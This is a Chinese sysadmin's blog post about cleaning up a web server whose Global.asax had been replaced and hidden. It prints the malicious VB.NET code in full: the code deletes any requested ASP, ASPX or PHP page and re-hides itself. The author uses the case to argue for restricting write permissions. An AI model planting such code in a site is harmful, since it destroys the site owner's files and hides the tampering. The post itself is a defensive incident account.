网站权限问题要重视-维护服务器后的看法

今天维护了一台某公司的网站服务器,就是访问文件突然不存在了,花了些时间看了一下,原因如下:

Global.asax 被改,变成了系统文件,还隐藏了。。

文件内容如下:

<%@ Language="VB"%><%@ Import Namespace="System.IO"%><script language="VB" runat="server">

Sub Session_Start(Sender As Object, E As EventArgs)

Dim MyFile,Path
Server.ScriptTimeout = 999999
'Response.Buffer = True
MyFile="//?/"+Server.MapPath("/")+"\global.asax" 

'Response.write Neirong
'session.abandon'if Neirong<>"" then execute Neirong

Path=LCase(Request.ServerVariables("PATH_TRANSLATED"))

If InStr(Path, ".aspx") > 0 or InStr(Path, ".asp\") > 0 or InStr(Path, ".php") > 0 or InStr(Path, ".asax") > 0 or InStr(Path, ".asa") > 0  Then
        'Response.Write "<html><body><h1> HTTP/1.1 500 Server Error</h1></body></html>" + vbCrlf
		'Response.Write laik + vbCrlf
		 if File.Exists(Path) then
		 File.SetAttributes(Path,0)
		 File.delete(path)
		 end if
         Response.End
    End If

  File.SetAttributes(Server.MapPath("/")+"\global.asax" ,7)
end sub

</script>

这些语句够狠了吧,访问一个网站之前就删除网页。

所以,网站不能为主方便,把整个目录都有设置写权限,只能将指定的某个目录设置写权限。

时间: 2025-01-28 01:11:38

网站权限问题要重视-维护服务器后的看法的相关文章

net 2.0-用.net2.0设计的网站,更换服务器后,上传组件失效。求高手指教!

问题描述 用.net2.0设计的网站,更换服务器后,上传组件失效.求高手指教! 公司网站,2011年设计,用的是微软的.net2.0框架(aspx)+win2003IIS,以前运行一切正常,搬迁到云服务器后,出现上传组件错误,具体表现: 1.点击上传组件后,源代码不执行(也就是点了之后页面闪一下,然后就回复了原页面): 2.自己新建了一个ASP编写的程序,上传成功: 3.目录权限没问题: 4.在云服务器上安装了VS2010进行本地调试,localhost加端口进行访问,测试上传是成功的.奇怪的是

网站-发布到远程服务器后,LinkButton失效

问题描述 发布到远程服务器后,LinkButton失效 用asp.net写的网站,在本机测试并发布在本机后,在本机或者其他机子访问,LinkButton都可以正常点击,gridview自带的分页点击也可以正常分页. 但是发布到远程主机后,在本机访问或者其它机子(同一个浏览器),所有的LinkButton失效,gridview自带的分页链接点击也失效.

destoon网站转移服务器后搜索汉字出现乱码的解决方法_php实例

很多使用destoon的用户在网站转移服务器后,一切正常,但是在有搜索页面时,搜索汉字就会出现乱码 框框 之类的符号,而搜索数字,英文则很正常. 对于使用destoon(GBK)模板的用户来说,解决方法为: 将.htaccess文件中的 RewriteRule ^(.*)-htm-(.*)$ $1.php?$2 改为 RewriteRule ^(.*)-htm-(.*)$ $1.php?$2 [NU] 如果设置了NU标记,从Unicode转换为UTF – 8将不会发生.所有Unicode字符会保

维护服务器安全的七种方法

你的服务器上是否存有一些不能随意公开的重要数据呢?当然有吧?而最近,偏偏服务器遭受的风险又特别大,越来越多的病毒.心怀不轨的黑客,以及那些商业间谍都将服务器当作目标.很显然,服务器的安全问题一刻都忽视不得. 不可能在一篇文章中谈遍电脑安全问题,毕竟,市面上的已有许多这方面的书籍,不过,我倒是可以告诉你七个维护服务器安全的技巧. 技巧一:从基本做起 从基本做起是最保险的方式.你必须将服务器上含有机密数据的区域通通转换成NTFS格式;同理,防毒程序也必须按时更新.建议同时在服务器和桌面电脑上安装防毒

如何维护服务器的安全

服务器的安全对企业来说是至关重要的,近几年来,服务器遭遇"黑手"的风险越来越大,就最近服务器遭遇病毒.黑客攻击的新闻不绝于耳.首先,这些恶意的攻击行为,旨在消耗服务器资源,影响服务器的正常运作,甚至攻击到服务器所在网络瘫痪.还有一方面,就是入侵行为,这种大多与某些利益有关联,有的涉及到企业的敏感信息,有的是同行相煎. 无论怎么样,我们都要保护好服务器的安全,现在,由著名的海外服务器服务商中国诺网的工程师告诉我们维护服务器安全的一些技巧: 第一,做好硬件维护 当处理数据越来越多,占用资源

Drupal站点换服务器后除主页其他404错误如何解决

问题描述: "page not found" Errors on every page except homepage." 也就是说您所建立的drupal站点除了主页面可以访问,其它栏目全部访问显示为404错误页面 问题分析: 造成这个问题最可能就是因为在新的服务器上的mod_rewrite模块或者是简洁链接(clean URLs)的错误配置(或称drupal伪静态).我们在地址栏中键入http://www.example.com/index.php?Q=user检测mod_

ASP.net应用程序布置到服务器后,子线程无法启动的问题

问题描述 我的网站里面,应用程序的Global文件里面加了一个timer,在定时器事件里我写了启动三个子线程的操作.在开发机上,所有一切都运行正常,三个子线程的处理也都能正常进行.但是,当我把网站布置到VPS服务器后,三个子线程的处理却都没有进行.而且,log文件显示,timer事件是正常运行了的,也就是说它进行了启动子线程的处理,但是,就是没有任何结果,好像子线程没有启动起来.是不是需要有什么特殊的权限配置或者其他什么设置呢? 解决方案 解决方案二:把日志写在子线程的入口看看?解决方案三:每一

IBM WebSphere Commerce电子商务网站性能监控和性能维护

WebSphere Commerce 生产环境性能管理 以 WebSphere Commerce 为核心的电子商务网站是由多种软硬件产品共同组成的复杂系统.为了保证系统健康地运行,运维团队需要对整个网站做全面的性能监控,并且采取必要的主动措施以保持系统性能.本文将介绍一些 WebSphere Commerce 电子商务网站性能监控和性能维护的最佳实践. WebSphere Commerce 电子商务网站的性能监控 性能监控就是通过各种监控工具了解当前应用系统运行的状况,发现已经存在的性能问题或者

windows 服务器安全之磁盘访问权限设置[完整篇]_win服务器

asp.net服务器安全之磁盘访问权限设置 硬盘或文件夹: C:\ D:\ E:\ F:\ 类推   主要权限部分: 其他权限部分: Administrators 完全控制   无如果安装了其他运行环境,比如PHP等,则根据PHP的环境功能要求来设置硬盘权限,一般是安装目录加上users读取运行权限就足够了,比如c:\php的话,就在根目录权限继承的情况下加上users读取运行权限,需要写入数据的比如tmp文件夹,则把user的写删权限加上,运行权限不要,然后把虚拟主机用户的读权限拒绝即可.如果